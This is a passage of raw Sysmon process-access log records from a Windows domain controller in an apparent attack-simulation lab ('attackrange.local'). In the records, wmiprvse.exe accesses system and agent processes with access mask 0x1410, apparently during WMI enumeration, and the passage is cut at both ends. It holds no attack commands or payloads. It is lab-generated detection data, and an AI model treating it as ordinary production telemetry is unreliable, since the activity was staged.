Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.210{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 